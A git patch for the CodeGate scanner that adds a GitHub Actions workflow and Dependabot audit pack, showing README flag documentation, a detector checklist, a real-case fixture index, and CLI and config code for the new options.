From a9ab51ade8d04e390608652ddac9d60fc4608f4f Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 11:51:27 +0000 Subject: [PATCH] feat: add workflow audit pack with real-case validation --- README.md | 63 +- docs/workflow-audit-parity-checklist.md | 58 ++ docs/workflow-audit-real-cases.md | 52 ++ src/cli.ts | 69 +- src/commands/scan-command.ts | 14 +- src/commands/scan-content-command.ts | 6 +- src/config.ts | 267 +++++++- src/config/inline-ignore.ts | 83 +++ src/config/suppression-policy.ts | 104 ++- src/layer2-static/action/parser.ts | 213 ++++++ src/layer2-static/action/types.ts | 43 ++ src/layer2-static/advisories/cache.ts | 62 ++ .../advisories/gha-advisory-client.ts | 13 + .../gha-known-vulnerable-actions.json | 4 + src/layer2-static/audits/registry.ts | 53 ++ src/layer2-static/audits/types.ts | 14 + src/layer2-static/dependabot/parser.ts | 242 +++++++ src/layer2-static/dependabot/types.ts | 56 ++ .../detectors/dependabot-cooldown.ts | 80 +++ .../detectors/dependabot-execution.ts | 86 +++ .../workflow-anonymous-definition.ts | 64 ++ .../detectors/workflow-archived-uses.ts | 193 ++++++ .../detectors/workflow-artipacked.ts | 81 +++ .../detectors/workflow-bot-conditions.ts | 141 ++++ .../detectors/workflow-cache-poisoning.ts | 87 +++ .../detectors/workflow-concurrency-limits.ts | 96 +++ .../detectors/workflow-dangerous-triggers.ts | 49 ++ .../workflow-excessive-permissions.ts | 83 +++ .../detectors/workflow-forbidden-uses.ts | 199 ++++++ .../detectors/workflow-github-env.ts | 64 ++ ...orkflow-hardcoded-container-credentials.ts | 119 ++++ .../detectors/workflow-impostor-commit.ts | 170 +++++ .../detectors/workflow-insecure-commands.ts | 92 +++ .../detectors/workflow-known-vuln-action.ts | 89 +++ .../detectors/workflow-misfeature.ts | 132 ++++ .../detectors/workflow-obfuscation.ts | 94 +++ .../workflow-overprovisioned-secrets.ts | 106 +++ .../detectors/workflow-ref-confusion.ts | 91 +++ 
.../workflow-ref-version-mismatch.ts | 251 +++++++ .../detectors/workflow-secrets-inherit.ts | 78 +++ .../detectors/workflow-secrets-outside-env.ts | 124 ++++ .../detectors/workflow-self-hosted-runner.ts | 86 +++ .../detectors/workflow-stale-action-refs.ts | 230 +++++++ .../detectors/workflow-superfluous-actions.ts | 93 +++ .../detectors/workflow-template-injection.ts | 114 ++++ .../workflow-undocumented-permissions.ts | 161 +++++ .../detectors/workflow-unpinned-images.ts | 141 ++++ .../detectors/workflow-unpinned-uses.ts | 77 +++ .../detectors/workflow-unredacted-secrets.ts | 124 ++++ .../detectors/workflow-unsound-condition.ts | 123 ++++ .../detectors/workflow-unsound-contains.ts | 115 ++++ .../workflow-use-trusted-publishing.ts | 87 +++ src/layer2-static/engine.ts | 628 ++++++++++++++++-- src/layer2-static/github/cache.ts | 59 ++ src/layer2-static/github/client.ts | 76 +++ .../workflow/injection-sinks.json | 5 + src/layer2-static/workflow/parser.ts | 108 +++ src/layer2-static/workflow/types.ts | 17 + src/pipeline.ts | 18 +- src/reporter/sarif.ts | 41 +- src/reporter/terminal.ts | 12 + src/scan.ts | 248 +++++-- src/types/finding.ts | 5 + .../.github/workflows/claude-dependabot.yml | 11 + .../workflows/pipeline-electron-lint.yml | 12 + .../.github/workflows/label.yml | 10 + .../.github/dependabot.yml | 8 + .../workflow-audits/real-cases/index.json | 26 + tests/cli/help-examples.test.ts | 7 + tests/cli/scan-command.test.ts | 64 ++ tests/cli/workflow-audit-command.test.ts | 90 +++ tests/config/config-precedence.test.ts | 67 ++ tests/config/inline-ignore.test.ts | 73 ++ tests/config/suppression-policy.test.ts | 64 ++ tests/fixtures/fixtures.test.ts | 20 + .../artifact-candidate-discovery.test.ts | 86 +++ tests/layer1/config-parser.test.ts | 26 + tests/layer1/user-scope-discovery.test.ts | 40 +- tests/layer2/action-parser.test.ts | 107 +++ tests/layer2/advisory-cache.test.ts | 63 ++ tests/layer2/audit-registry.test.ts | 65 ++ tests/layer2/dependabot-cooldown.test.ts | 
50 ++ tests/layer2/dependabot-execution.test.ts | 48 ++ tests/layer2/dependabot-parser.test.ts | 122 ++++ tests/layer2/github-client.test.ts | 48 ++ .../workflow-anonymous-definition.test.ts | 42 ++ tests/layer2/workflow-archived-uses.test.ts | 86 +++ tests/layer2/workflow-artipacked.test.ts | 72 ++ tests/layer2/workflow-bot-conditions.test.ts | 65 ++ tests/layer2/workflow-cache-poisoning.test.ts | 74 +++ .../workflow-concurrency-limits.test.ts | 53 ++ .../workflow-dangerous-triggers.test.ts | 76 +++ .../workflow-excessive-permissions.test.ts | 79 +++ tests/layer2/workflow-forbidden-uses.test.ts | 78 +++ tests/layer2/workflow-github-env.test.ts | 54 ++ ...ow-hardcoded-container-credentials.test.ts | 63 ++ tests/layer2/workflow-impostor-commit.test.ts | 95 +++ .../layer2/workflow-insecure-commands.test.ts | 58 ++ .../layer2/workflow-known-vuln-action.test.ts | 60 ++ tests/layer2/workflow-misfeature.test.ts | 52 ++ tests/layer2/workflow-obfuscation.test.ts | 45 ++ .../workflow-overprovisioned-secrets.test.ts | 72 ++ tests/layer2/workflow-parser.test.ts | 46 ++ tests/layer2/workflow-real-cases.test.ts | 67 ++ tests/layer2/workflow-ref-confusion.test.ts | 70 ++ .../workflow-ref-version-mismatch.test.ts | 111 ++++ tests/layer2/workflow-secrets-inherit.test.ts | 57 ++ .../workflow-secrets-outside-env.test.ts | 74 +++ .../workflow-self-hosted-runner.test.ts | 54 ++ .../layer2/workflow-stale-action-refs.test.ts | 107 +++ .../workflow-superfluous-actions.test.ts | 41 ++ .../workflow-template-injection.test.ts | 117 ++++ .../workflow-undocumented-permissions.test.ts | 87 +++ tests/layer2/workflow-unpinned-images.test.ts | 63 ++ tests/layer2/workflow-unpinned-uses.test.ts | 74 +++ .../workflow-unredacted-secrets.test.ts | 71 ++ .../layer2/workflow-unsound-condition.test.ts | 51 ++ .../layer2/workflow-unsound-contains.test.ts | 51 ++ .../workflow-use-trusted-publishing.test.ts | 84 +++ tests/layer2/workflow-wave-b-engine.test.ts | 128 ++++ 
tests/layer2/workflow-wave-cde-engine.test.ts | 121 ++++ .../workflow-audit-parity-contract.test.ts | 61 ++ tests/pipeline/static-pipeline.test.ts | 4 +- tests/report/finding-fingerprint.test.ts | 4 +- tests/reporter/sarif.test.ts | 13 +- tests/reporter/terminal.test.ts | 11 + 126 files changed, 10192 insertions(+), 159 deletions(-) create mode 100644 docs/workflow-audit-parity-checklist.md create mode 100644 docs/workflow-audit-real-cases.md create mode 100644 src/config/inline-ignore.ts create mode 100644 src/layer2-static/action/parser.ts create mode 100644 src/layer2-static/action/types.ts create mode 100644 src/layer2-static/advisories/cache.ts create mode 100644 src/layer2-static/advisories/gha-advisory-client.ts create mode 100644 src/layer2-static/advisories/gha-known-vulnerable-actions.json create mode 100644 src/layer2-static/audits/registry.ts create mode 100644 src/layer2-static/audits/types.ts create mode 100644 src/layer2-static/dependabot/parser.ts create mode 100644 src/layer2-static/dependabot/types.ts create mode 100644 src/layer2-static/detectors/dependabot-cooldown.ts create mode 100644 src/layer2-static/detectors/dependabot-execution.ts create mode 100644 src/layer2-static/detectors/workflow-anonymous-definition.ts create mode 100644 src/layer2-static/detectors/workflow-archived-uses.ts create mode 100644 src/layer2-static/detectors/workflow-artipacked.ts create mode 100644 src/layer2-static/detectors/workflow-bot-conditions.ts create mode 100644 src/layer2-static/detectors/workflow-cache-poisoning.ts create mode 100644 src/layer2-static/detectors/workflow-concurrency-limits.ts create mode 100644 src/layer2-static/detectors/workflow-dangerous-triggers.ts create mode 100644 src/layer2-static/detectors/workflow-excessive-permissions.ts create mode 100644 src/layer2-static/detectors/workflow-forbidden-uses.ts create mode 100644 src/layer2-static/detectors/workflow-github-env.ts create mode 100644 
src/layer2-static/detectors/workflow-hardcoded-container-credentials.ts create mode 100644 src/layer2-static/detectors/workflow-impostor-commit.ts create mode 100644 src/layer2-static/detectors/workflow-insecure-commands.ts create mode 100644 src/layer2-static/detectors/workflow-known-vuln-action.ts create mode 100644 src/layer2-static/detectors/workflow-misfeature.ts create mode 100644 src/layer2-static/detectors/workflow-obfuscation.ts create mode 100644 src/layer2-static/detectors/workflow-overprovisioned-secrets.ts create mode 100644 src/layer2-static/detectors/workflow-ref-confusion.ts create mode 100644 src/layer2-static/detectors/workflow-ref-version-mismatch.ts create mode 100644 src/layer2-static/detectors/workflow-secrets-inherit.ts create mode 100644 src/layer2-static/detectors/workflow-secrets-outside-env.ts create mode 100644 src/layer2-static/detectors/workflow-self-hosted-runner.ts create mode 100644 src/layer2-static/detectors/workflow-stale-action-refs.ts create mode 100644 src/layer2-static/detectors/workflow-superfluous-actions.ts create mode 100644 src/layer2-static/detectors/workflow-template-injection.ts create mode 100644 src/layer2-static/detectors/workflow-undocumented-permissions.ts create mode 100644 src/layer2-static/detectors/workflow-unpinned-images.ts create mode 100644 src/layer2-static/detectors/workflow-unpinned-uses.ts create mode 100644 src/layer2-static/detectors/workflow-unredacted-secrets.ts create mode 100644 src/layer2-static/detectors/workflow-unsound-condition.ts create mode 100644 src/layer2-static/detectors/workflow-unsound-contains.ts create mode 100644 src/layer2-static/detectors/workflow-use-trusted-publishing.ts create mode 100644 src/layer2-static/github/cache.ts create mode 100644 src/layer2-static/github/client.ts create mode 100644 src/layer2-static/workflow/injection-sinks.json create mode 100644 src/layer2-static/workflow/parser.ts create mode 100644 src/layer2-static/workflow/types.ts create mode 100644 
test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml create mode 100644 test-fixtures/workflow-audits/real-cases/index.json create mode 100644 tests/cli/workflow-audit-command.test.ts create mode 100644 tests/config/inline-ignore.test.ts create mode 100644 tests/layer2/action-parser.test.ts create mode 100644 tests/layer2/advisory-cache.test.ts create mode 100644 tests/layer2/audit-registry.test.ts create mode 100644 tests/layer2/dependabot-cooldown.test.ts create mode 100644 tests/layer2/dependabot-execution.test.ts create mode 100644 tests/layer2/dependabot-parser.test.ts create mode 100644 tests/layer2/github-client.test.ts create mode 100644 tests/layer2/workflow-anonymous-definition.test.ts create mode 100644 tests/layer2/workflow-archived-uses.test.ts create mode 100644 tests/layer2/workflow-artipacked.test.ts create mode 100644 tests/layer2/workflow-bot-conditions.test.ts create mode 100644 tests/layer2/workflow-cache-poisoning.test.ts create mode 100644 tests/layer2/workflow-concurrency-limits.test.ts create mode 100644 tests/layer2/workflow-dangerous-triggers.test.ts create mode 100644 tests/layer2/workflow-excessive-permissions.test.ts create mode 100644 tests/layer2/workflow-forbidden-uses.test.ts create mode 100644 tests/layer2/workflow-github-env.test.ts create mode 100644 tests/layer2/workflow-hardcoded-container-credentials.test.ts create mode 100644 tests/layer2/workflow-impostor-commit.test.ts create mode 100644 tests/layer2/workflow-insecure-commands.test.ts create mode 100644 tests/layer2/workflow-known-vuln-action.test.ts create mode 100644 
tests/layer2/workflow-misfeature.test.ts create mode 100644 tests/layer2/workflow-obfuscation.test.ts create mode 100644 tests/layer2/workflow-overprovisioned-secrets.test.ts create mode 100644 tests/layer2/workflow-parser.test.ts create mode 100644 tests/layer2/workflow-real-cases.test.ts create mode 100644 tests/layer2/workflow-ref-confusion.test.ts create mode 100644 tests/layer2/workflow-ref-version-mismatch.test.ts create mode 100644 tests/layer2/workflow-secrets-inherit.test.ts create mode 100644 tests/layer2/workflow-secrets-outside-env.test.ts create mode 100644 tests/layer2/workflow-self-hosted-runner.test.ts create mode 100644 tests/layer2/workflow-stale-action-refs.test.ts create mode 100644 tests/layer2/workflow-superfluous-actions.test.ts create mode 100644 tests/layer2/workflow-template-injection.test.ts create mode 100644 tests/layer2/workflow-undocumented-permissions.test.ts create mode 100644 tests/layer2/workflow-unpinned-images.test.ts create mode 100644 tests/layer2/workflow-unpinned-uses.test.ts create mode 100644 tests/layer2/workflow-unredacted-secrets.test.ts create mode 100644 tests/layer2/workflow-unsound-condition.test.ts create mode 100644 tests/layer2/workflow-unsound-contains.test.ts create mode 100644 tests/layer2/workflow-use-trusted-publishing.test.ts create mode 100644 tests/layer2/workflow-wave-b-engine.test.ts create mode 100644 tests/layer2/workflow-wave-cde-engine.test.ts create mode 100644 tests/meta/workflow-audit-parity-contract.test.ts diff --git a/README.md b/README.md index d7c2b96..dc9a40e 100644 --- a/README.md +++ b/README.md @@ -120,21 +120,26 @@ See the [Configuration](#configuration) section for full settings and examples. ## `scan` Command Flags -| Flag | Purpose | -| ---------------------- | --------------------------------------------------------------------------------------------------------- | -| `--deep` | Enable Layer 3 dynamic analysis. | -| `--remediate` | Enter remediation mode after scan. 
| -| `--fix-safe` | Auto-fix unambiguous critical findings. | -| `--dry-run` | Show proposed fixes but write nothing. | -| `--patch` | Generate a patch file for review workflows. | -| `--no-tui` | Disable TUI and interactive prompts. | -| `--format ` | Output format: `terminal`, `json`, `sarif`, `markdown`, `html`. | -| `--output ` | Write report to file instead of stdout. | -| `--verbose` | Show extended output in terminal format. | -| `--config ` | Use a specific global config file path. | -| `--force` | Skip interactive confirmations. | -| `--include-user-scope` | Force-enable user/home AI tool config paths for this run (useful if config disables user-scope scanning). | -| `--reset-state` | Clear persisted scan-state history and exit. | +| Flag | Purpose | +| ----------------------- | --------------------------------------------------------------------------------------------------------- | +| `--deep` | Enable Layer 3 dynamic analysis. | +| `--remediate` | Enter remediation mode after scan. | +| `--fix-safe` | Auto-fix unambiguous critical findings. | +| `--dry-run` | Show proposed fixes but write nothing. | +| `--patch` | Generate a patch file for review workflows. | +| `--no-tui` | Disable TUI and interactive prompts. | +| `--format ` | Output format: `terminal`, `json`, `sarif`, `markdown`, `html`. | +| `--output ` | Write report to file instead of stdout. | +| `--verbose` | Show extended output in terminal format. | +| `--config ` | Use a specific global config file path. | +| `--force` | Skip interactive confirmations. | +| `--include-user-scope` | Force-enable user/home AI tool config paths for this run (useful if config disables user-scope scanning). | +| `--collect ` | Collection scope mode (`default`, `project`, `user`, `explicit`, `all`). Repeatable. | +| `--strict-collection` | Treat parse failures in collected inputs as high-severity findings. | +| `--persona ` | Audit sensitivity (`regular`, `pedantic`, `auditor`). 
| +| `--runtime-mode ` | Runtime mode for optional online audits (`offline`, `online`, `online-no-audits`). | +| `--workflow-audits` | Enable CI/CD audit pack for GitHub workflow, action, and Dependabot inputs. | +| `--reset-state` | Clear persisted scan-state history and exit. | Examples: @@ -148,9 +153,37 @@ codegate scan . --deep --force codegate scan . --remediate codegate scan . --fix-safe codegate scan . --remediate --dry-run --patch +codegate scan . --workflow-audits --collect project --persona auditor --runtime-mode online +codegate scan . --workflow-audits --strict-collection codegate scan . --reset-state ``` +## Workflow Audit Pack + +CodeGate can audit GitHub Actions workflows when `--workflow-audits` is enabled. + +Current checks include: + +- Unpinned external action references (`uses: owner/repo@tag` instead of commit SHA) +- High-risk triggers (`pull_request_target`, `workflow_run`) +- Overly broad permissions (`write-all` and explicit write grants) +- Template expression injection patterns in run steps and known sink inputs +- Known vulnerable action references (online runtime mode) +- Dependabot cooldown and execution-risk checks +- Workflow hygiene checks (concurrency gates, obfuscation, unsafe conditional trust) + +Track the current workflow-audit coverage and backlog in the [workflow audit parity checklist](docs/workflow-audit-parity-checklist.md). +Real public validation fixtures and source provenance are documented in [workflow audit real-case corpus](docs/workflow-audit-real-cases.md). + +Examples: + +```bash +codegate scan . --workflow-audits +codegate scan . --workflow-audits --collect project --persona auditor +codegate scan . --workflow-audits --runtime-mode online +codegate scan . --workflow-audits --collect-kind dependabot +``` + ## `scan-content` Command `codegate scan-content ` scans inline content directly from the command line. 
It is useful when you want to inspect JSON, YAML, TOML, Markdown, or plain text before writing it to disk or installing it into a tool configuration. diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md new file mode 100644 index 0000000..3716e06 --- /dev/null +++ b/docs/workflow-audit-parity-checklist.md @@ -0,0 +1,58 @@ +# CodeGate Workflow Audit Parity Checklist + +Use this checklist to track the workflow-audit detectors implemented in CodeGate and the backlog that remains. + +## Wave A + +- [x] `dangerous-triggers` +- [x] `excessive-permissions` +- [x] `known-vulnerable-actions` +- [x] `template-injection` +- [x] `unpinned-uses` +- [x] `artipacked` +- [x] `cache-poisoning` +- [x] `github-env` +- [x] `insecure-commands` +- [x] `self-hosted-runner` +- [x] `overprovisioned-secrets` +- [x] `secrets-outside-env` +- [x] `secrets-inherit` +- [x] `use-trusted-publishing` +- [x] `undocumented-permissions` + +## Wave B + +- [x] `archived-uses` +- [x] `stale-action-refs` +- [x] `forbidden-uses` +- [x] `ref-confusion` +- [x] `ref-version-mismatch` +- [x] `impostor-commit` +- [x] `unpinned-images` + +## Wave C + +- [x] `anonymous-definition` +- [x] `concurrency-limits` +- [x] `superfluous-actions` +- [x] `misfeature` +- [x] `obfuscation` +- [x] `unsound-condition` +- [x] `unsound-contains` + +## Wave D + +- [x] `dependabot-cooldown` +- [x] `dependabot-execution` + +## Wave E + +- [x] `hardcoded-container-credentials` +- [x] `unredacted-secrets` +- [x] `bot-conditions` + +## Notes + +- Checked items are implemented in CodeGate. +- Unchecked items remain in the backlog. +- The checklist is intentionally limited to CodeGate workflow-audit terminology. 
diff --git a/docs/workflow-audit-real-cases.md b/docs/workflow-audit-real-cases.md new file mode 100644 index 0000000..79d2ee3 --- /dev/null +++ b/docs/workflow-audit-real-cases.md @@ -0,0 +1,52 @@ +# Workflow Audit Real-Case Corpus + +This document tracks real public workflow/dependabot examples used to validate workflow-audit detections locally. + +## Local Corpus + +Root: + +- `test-fixtures/workflow-audits/real-cases/` +- `test-fixtures/workflow-audits/real-cases/index.json` + +Each fixture is commit-pinned to keep source provenance stable. + +## Cases + +1. `RC-01-bot-conditions` + +- Expected rule: `bot-conditions` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml` + +2. `RC-02-obfuscation` + +- Expected rule: `workflow-obfuscation` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml` + +3. `RC-03-concurrency-limits` + +- Expected rule: `workflow-concurrency-limits` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml` + +4. 
`RC-04-dependabot-execution` + +- Expected rule: `dependabot-execution` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml` + +## Validation + +Run targeted test: + +```bash +npm test -- tests/layer2/workflow-real-cases.test.ts +``` + +Run CLI manually: + +```bash +codegate scan test-fixtures/workflow-audits/real-cases/RC-02-obfuscation --workflow-audits --no-tui --format json +``` diff --git a/src/cli.ts b/src/cli.ts index 4e3db67..68c7e01 100644 --- a/src/cli.ts +++ b/src/cli.ts @@ -10,6 +10,10 @@ import { Command, Option } from "commander"; import { DEFAULT_CONFIG, OUTPUT_FORMATS, + PERSONAS, + RUNTIME_MODES, + SCAN_COLLECTION_MODES, + SCAN_COLLECTION_KINDS, resolveEffectiveConfig, type CliConfigOverrides, type CodeGateConfig, @@ -286,6 +290,8 @@ const defaultCliDeps: CliDeps = { prepareScanDiscovery: (scanTarget, config, options) => createScanDiscoveryContext(scanTarget, undefined, { includeUserScope: config?.scan_user_scope === true, + collectModes: config?.scan_collection_modes, + collectKinds: config?.scan_collection_kinds, parseSelected: true, explicitCandidates: options?.explicitCandidates, }), @@ -318,6 +324,8 @@ const defaultCliDeps: CliDeps = { ? discoverDeepScanResourcesFromContext(discoveryContext) : discoverDeepScanResources(scanTarget, undefined, { includeUserScope: config?.scan_user_scope === true, + collectModes: config?.scan_collection_modes, + collectKinds: config?.scan_collection_kinds, }), discoverLocalTextTargets: (_scanTarget, _config, discoveryContext) => discoveryContext ? 
discoverLocalTextAnalysisTargetsFromContext(discoveryContext) : [], @@ -362,6 +370,34 @@ function addScanCommand(program: Command, version: string, deps: CliDeps): void .option("--config ", "use a specific global config file") .option("--force", "skip interactive confirmations") .option("--include-user-scope", "include user/home AI tool config paths in scan") + .addOption( + new Option( + "--collect ", + "collection mode (repeatable): default, project, user, explicit, all", + ) + .choices([...SCAN_COLLECTION_MODES]) + .argParser((value: string, previous: string[] = []) => [...previous, value]), + ) + .addOption( + new Option( + "--collect-kind ", + "collection kind (repeatable): workflows, actions, dependabot", + ) + .choices([...SCAN_COLLECTION_KINDS]) + .argParser((value: string, previous: string[] = []) => [...previous, value]), + ) + .option("--strict-collection", "treat parse failures in collected inputs as high severity") + .addOption( + new Option("--persona ", "audit sensitivity persona") + .choices([...PERSONAS]) + .argParser((value) => value), + ) + .addOption( + new Option("--runtime-mode ", "runtime network mode for optional online audits") + .choices([...RUNTIME_MODES]) + .argParser((value) => value), + ) + .option("--workflow-audits", "enable workflow security audit pack for .github/workflows") .option("--skill ", "select one skill directory when scanning a skills index repo URL") .option("--reset-state", "clear persisted scan-state history and exit") .addHelpText( @@ -371,6 +407,7 @@ function addScanCommand(program: Command, version: string, deps: CliDeps): void "codegate scan ./skills/security-review/SKILL.md", "codegate scan https://github.com/owner/repo", "codegate scan https://github.com/owner/repo --skill security-review", + "codegate scan . 
--workflow-audits --collect project --persona auditor --runtime-mode online", "codegate scan https://github.com/owner/repo/blob/main/skills/security-review/SKILL.md", "codegate scan https://example.com/security-review/SKILL.md --format json", ]), @@ -388,6 +425,7 @@ function addScanCommand(program: Command, version: string, deps: CliDeps): void let resolvedTarget: ResolvedScanTarget | undefined; try { + const scanOptions = options as ScanCommandOptions & { collectKind?: string[] }; const resolveTarget = deps.resolveScanTarget ?? ((input: { @@ -412,13 +450,30 @@ function addScanCommand(program: Command, version: string, deps: CliDeps): void scanTarget, cli: cliConfig, }); - const config = - options.includeUserScope === true - ? { - ...baseConfig, - scan_user_scope: true, - } - : baseConfig; + const config = { + ...baseConfig, + scan_collection_modes: + options.collect && options.collect.length > 0 + ? options.collect + : baseConfig.scan_collection_modes, + scan_collection_kinds: (scanOptions.collectKind && scanOptions.collectKind.length > 0 + ? scanOptions.collectKind + : baseConfig.scan_collection_kinds) as CodeGateConfig["scan_collection_kinds"], + strict_collection: + options.strictCollection === true + ? true + : (baseConfig.strict_collection ?? DEFAULT_CONFIG.strict_collection), + persona: options.persona ?? baseConfig.persona, + runtime_mode: options.runtimeMode ?? baseConfig.runtime_mode, + workflow_audits: { + enabled: + options.workflowAudits === true + ? true + : (baseConfig.workflow_audits?.enabled ?? false), + }, + scan_user_scope: + options.includeUserScope === true ? true : (baseConfig.scan_user_scope ?? false), + }; if (options.resetState) { const reset = deps.resetScanState ?? 
((path?: string) => resetScanState(path)); diff --git a/src/commands/scan-command.ts b/src/commands/scan-command.ts index 277d776..6867a72 100644 --- a/src/commands/scan-command.ts +++ b/src/commands/scan-command.ts @@ -1,5 +1,12 @@ import { resolve } from "node:path"; -import { applyConfigPolicy, type CodeGateConfig, type OutputFormat } from "../config.js"; +import { + applyConfigPolicy, + type AuditPersona, + type CodeGateConfig, + type OutputFormat, + type RuntimeMode, + type ScanCollectionMode, +} from "../config.js"; import { buildMetaAgentCommand, type MetaAgentCommand, @@ -52,6 +59,11 @@ export interface ScanCommandOptions { resetState?: boolean; includeUserScope?: boolean; skill?: string; + collect?: ScanCollectionMode[]; + strictCollection?: boolean; + persona?: AuditPersona; + runtimeMode?: RuntimeMode; + workflowAudits?: boolean; } export interface ScanRunnerInput { diff --git a/src/commands/scan-content-command.ts b/src/commands/scan-content-command.ts index 5303d48..3c1a1fe 100644 --- a/src/commands/scan-content-command.ts +++ b/src/commands/scan-content-command.ts @@ -43,7 +43,7 @@ export async function executeScanContentCommand( const kbVersion = loadKnowledgeBase().schemaVersion; const report = applyConfigPolicy( - runStaticPipeline({ + await runStaticPipeline({ version: input.version, kbVersion, scanTarget: `scan-content:${input.type}`, @@ -71,6 +71,10 @@ export async function executeScanContentCommand( rulePackPaths: input.config.rule_pack_paths, allowedRules: input.config.allowed_rules, skipRules: input.config.skip_rules, + persona: input.config.persona, + runtimeMode: input.config.runtime_mode, + workflowAuditsEnabled: input.config.workflow_audits?.enabled === true, + rulePolicies: input.config.rules, }, }), input.config, diff --git a/src/config.ts b/src/config.ts index c4ff1ae..685774a 100644 --- a/src/config.ts +++ b/src/config.ts @@ -5,11 +5,28 @@ import { parse as parseJsonc } from "jsonc-parser"; import type { Finding } from 
"./types/finding.js"; import type { CodeGateReport } from "./types/report.js"; import { applyReportSummary, computeExitCode as computeReportExitCode } from "./report-summary.js"; -import { applySuppressionPolicy, type SuppressionRule } from "./config/suppression-policy.js"; +import { + applySuppressionPolicy, + type RulePolicyConfig, + type RulePolicyMap, + type SuppressionRule, +} from "./config/suppression-policy.js"; export const OUTPUT_FORMATS = ["terminal", "json", "sarif", "markdown", "html"] as const; export type OutputFormat = (typeof OUTPUT_FORMATS)[number]; +export const SCAN_COLLECTION_MODES = ["default", "project", "user", "explicit", "all"] as const; +export type ScanCollectionMode = (typeof SCAN_COLLECTION_MODES)[number]; + +export const SCAN_COLLECTION_KINDS = ["workflows", "actions", "dependabot"] as const; +export type ScanCollectionKind = (typeof SCAN_COLLECTION_KINDS)[number]; + +export const PERSONAS = ["regular", "pedantic", "auditor"] as const; +export type AuditPersona = (typeof PERSONAS)[number]; + +export const RUNTIME_MODES = ["offline", "online", "online-no-audits"] as const; +export type RuntimeMode = (typeof RUNTIME_MODES)[number]; + export const SEVERITY_THRESHOLDS = ["critical", "high", "medium", "low", "info"] as const; export type SeverityThreshold = (typeof SEVERITY_THRESHOLDS)[number]; @@ -25,6 +42,10 @@ export interface ToolDiscoveryConfig { skip_tools: string[]; } +export interface WorkflowAuditConfig { + enabled: boolean; +} + export interface CodeGateConfig { severity_threshold: SeverityThreshold; auto_proceed_below_threshold: boolean; @@ -46,6 +67,13 @@ export interface CodeGateConfig { rule_pack_paths?: string[]; allowed_rules?: string[]; skip_rules?: string[]; + strict_collection?: boolean; + scan_collection_modes?: ScanCollectionMode[]; + scan_collection_kinds?: ScanCollectionKind[]; + rules?: RulePolicyMap; + persona?: AuditPersona; + runtime_mode?: RuntimeMode; + workflow_audits?: WorkflowAuditConfig; suppress_findings: 
string[]; suppression_rules?: SuppressionRule[]; } @@ -83,6 +111,15 @@ interface PartialCodeGateConfig { rule_pack_paths?: string[]; allowed_rules?: string[]; skip_rules?: string[]; + strict_collection?: boolean; + scan_collection_modes?: string[]; + scan_collection_kinds?: string[]; + rules?: Record; + persona?: string; + runtime_mode?: string; + workflow_audits?: { + enabled?: boolean; + }; suppress_findings?: string[]; suppression_rules?: SuppressionRule[]; } @@ -131,10 +168,21 @@ export const DEFAULT_CONFIG: CodeGateConfig = { rule_pack_paths: [], allowed_rules: [], skip_rules: [], + strict_collection: false, + scan_collection_modes: ["default"], + persona: "regular", + runtime_mode: "offline", + workflow_audits: { enabled: false }, suppress_findings: [], suppression_rules: [], }; +interface PartialRulePolicyConfig { + disable?: boolean; + ignore?: string[]; + config?: Record; +} + function normalizeOutputFormat(value: string | undefined): OutputFormat | undefined { if (!value) { return undefined; @@ -157,6 +205,180 @@ function normalizeOptionalPath(value: string | undefined): string | undefined { return trimmed.length > 0 ? trimmed : undefined; } +function normalizeCollectionMode(value: string | undefined): ScanCollectionMode | undefined { + if (!value) { + return undefined; + } + return SCAN_COLLECTION_MODES.find((mode) => mode === value) ?? undefined; +} + +function normalizeCollectionModes(values: string[] | undefined): ScanCollectionMode[] | undefined { + if (!values) { + return undefined; + } + + const normalized: ScanCollectionMode[] = []; + for (const value of values) { + const mode = normalizeCollectionMode(value); + if (!mode || normalized.includes(mode)) { + continue; + } + normalized.push(mode); + } + + return normalized.length > 0 ? 
normalized : undefined; +} + +function normalizeCollectionKind(value: string | undefined): ScanCollectionKind | undefined { + if (!value) { + return undefined; + } + return SCAN_COLLECTION_KINDS.find((kind) => kind === value) ?? undefined; +} + +function normalizeCollectionKinds(values: string[] | undefined): ScanCollectionKind[] | undefined { + if (!values) { + return undefined; + } + + const normalized: ScanCollectionKind[] = []; + for (const value of values) { + const kind = normalizeCollectionKind(value); + if (!kind || normalized.includes(kind)) { + continue; + } + normalized.push(kind); + } + + return normalized.length > 0 ? normalized : undefined; +} + +function isPlainObject(value: unknown): value is Record { + return !!value && typeof value === "object" && !Array.isArray(value); +} + +function normalizeRulePolicyConfig(value: unknown): RulePolicyConfig | undefined { + if (!isPlainObject(value)) { + return undefined; + } + + const disable = typeof value.disable === "boolean" ? value.disable : undefined; + const ignoreRaw = value.ignore; + const ignore = + Array.isArray(ignoreRaw) && ignoreRaw.length > 0 + ? ignoreRaw + .filter((entry): entry is string => typeof entry === "string") + .map((entry) => entry.trim()) + .filter((entry) => entry.length > 0) + : undefined; + const configRaw = value.config; + const config = isPlainObject(configRaw) ? 
